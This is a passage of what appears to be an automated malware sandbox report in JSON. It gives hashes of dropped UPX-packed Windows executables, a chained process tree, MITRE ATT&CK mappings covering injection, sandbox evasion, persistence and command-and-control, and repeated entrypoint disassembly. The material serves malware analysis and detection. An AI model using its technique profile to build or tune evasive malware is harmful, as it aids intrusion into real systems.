"type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vjntv.exe", "file_size": 344940, "sha256": "df1e1b68335b5922161a3518c2c63ffe68ba9e00e26b401f601429b96466baf6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bpfndvl.exe", "file_size": 344925, "sha256": "8adeb5f45318a1a4c39fdb73274d1e49152a98a94d9e8e06404cb9394df54c73", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "blrpxnl.exe", "file_size": 344910, "sha256": "b527f9c0acdb9c23f9e383d1a905786d0b96f7f9c031726a1cdaf3b816e4196a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pvrjd.exe", "file_size": 344900, "sha256": "d9de7d90a0c6d4a3bef3aa315df8a8b4361eb528e7707d425c432ddcaca66f8c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nbdbxn.exe", "file_size": 344881, "sha256": "7e7b622e4455d353bb9332964040c4d8e72e869b07aba90f84f4de46b5314a17", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tlvnl.exe", "file_size": 344864, "sha256": "9b3a54a063c99ff0a04ae766b33fa110c890d1a69bb5c5b104fc42c041d9cd42", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dtrfjn.exe", "file_size": 344846, "sha256": "af7a76f2e3f54a006c9204ae8682ac19ce0f50927567c2d02a2284bb68703452", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lvttpxb.exe", "file_size": 344836, "sha256": "77815481106c96a771efd43fbc64cd2b1b98ad781cbff3253d3287f577e89fb7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lxvdh.exe", "file_size": 344819, "sha256": "3c901db1fd1a9f5cdf6884c2eaf5e6356558eca5af76b9848ad09829bb5bad92", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jbbxlvh.exe", "file_size": 344804, "sha256": "6fcac477bd1f61cdf7521ddccb19ab080b0e95c90d7d560790ad8c411ce70cf3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4408646.exe", "file_size": 344787, "sha256": "469d74c7ed9bc578d7c7d2b36950f4fda74edd3b3a96e7fc293dc6608d1de2b8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "86668.exe", "file_size": 344775, "sha256": "8a50d0ad362c8dfdb1ca0ff3c49312fa58823de21644a6d647f1333f40bcc8e3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "08086.exe", "file_size": 344759, "sha256": "ae0e63e95560fbc2b04c379b0e5a391b74654b48a20cdff853a4163104d1ed3d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "624642.exe", "file_size": 344749, "sha256": "475b0760451bb9f9b18e53b2672a6452957395ddd93f0da6b146f57adb9434c3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "48064.exe", "file_size": 344739, "sha256": "260b97dd3ea3cc2b86042a4c672d62114460c5d0b52e01c6252f3c5786818be5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pvtnp.exe", "file_size": 344063, "sha256": "27c2577e8df375fcc063fe2be2d7992d3f165dfaa70162b560ef169fa75dd77b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pvtnp.exe (PID: 4252)", "threat_level_readable": "no specific threat"}], "processes": [{"uid": "00000000-00005920", "name": "7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe", "normalized_path": "C:\\7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe", "sha256": "7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c"}, {"uid": "00000000-00006044", "parentuid": "00000000-00005920", "name": "4822004.exe", "normalized_path": "c:\\4822004.exe", "sha256": "f3d02ec9689a591c6b753fef93cf0359afc9ee976ab3aa9fd86c064d583f2fec"}, {"uid": "00000000-00005968", "parentuid": "00000000-00006044", "name": "26224.exe", "normalized_path": "c:\\26224.exe", "sha256": "c23b022c5ecdbfddf0eac6545acf1d7b62dd4b2d39e72e3cdeef9c7058bbf2a3"}, {"uid": "00000000-00005996", "parentuid": "00000000-00005968", "name": "226242.exe", "normalized_path": "c:\\226242.exe", "sha256": "d77e0416edcbdaae9ba7e6170cadddc1c9d3b79a653b86ecc5962e5dbe80b6cd"}, {"uid": "00000000-00005928", "parentuid": "00000000-00005996", "name": "8402624.exe", "normalized_path": "c:\\8402624.exe", "sha256": "82527f6c752d5029f3479147176586828fec0c35d4a7faf204eccceffd5aaac6"}, {"uid": "00000000-00006016", "parentuid": "00000000-00005928", "name": "484648.exe", "normalized_path": "c:\\484648.exe", "sha256": "40e2431f25b2cf4d39fa5b075e1de0b3d3b26a02f30ae5588ce679164d8d92e2"}, {"uid": "00000000-00005936", "parentuid": "00000000-00006016", "name": "4262848.exe", "normalized_path": "c:\\4262848.exe", "sha256": "97f97ee1d7077e9522d85c5b72edd3b00d2dc3987ddb08b47fcb2e5941d22ac1"}, {"uid": "00000000-00003884", "parentuid": "00000000-00005936", "name": "20484.exe", "normalized_path": "c:\\20484.exe", "sha256": "5d03d8c2c01506f7e5c3ab0287311c54a3e8890f8aad9afec3ec633e1708a220"}, {"uid": "00000000-00004216", "parentuid": "00000000-00003884", "name": "806288.exe", "normalized_path": "c:\\806288.exe", "sha256": "5f5a30d6f22a469941c3c33608acd4f034e8c7327cc9ae7d7d280b28a9f72996"}, {"uid": "00000000-00006088", "parentuid": "00000000-00004216", "name": "hrrrr.exe", "normalized_path": "c:\\hrrrr.exe", "sha256": "4f6562889e0ae257e984c9878c3b1c84ed17e60a45777588450f735e767b35cd"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 10}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"20406.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"486604.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"2028060.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"dprdh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"nfhppl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4080282.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"vjntv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"bpfndvl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"blrpxnl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"pvrjd.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"nbdbxn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"tlvnl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"dtrfjn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"lvttpxb.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"lxvdh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"jbbxlvh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4408646.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"86668.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"08086.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"624642.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"48064.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"lxdxh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hltjhx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"fnlpb.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"20406.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"486604.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"2028060.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"dprdh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"nfhppl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"4080282.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"vjntv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"bpfndvl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"blrpxnl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"pvrjd.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 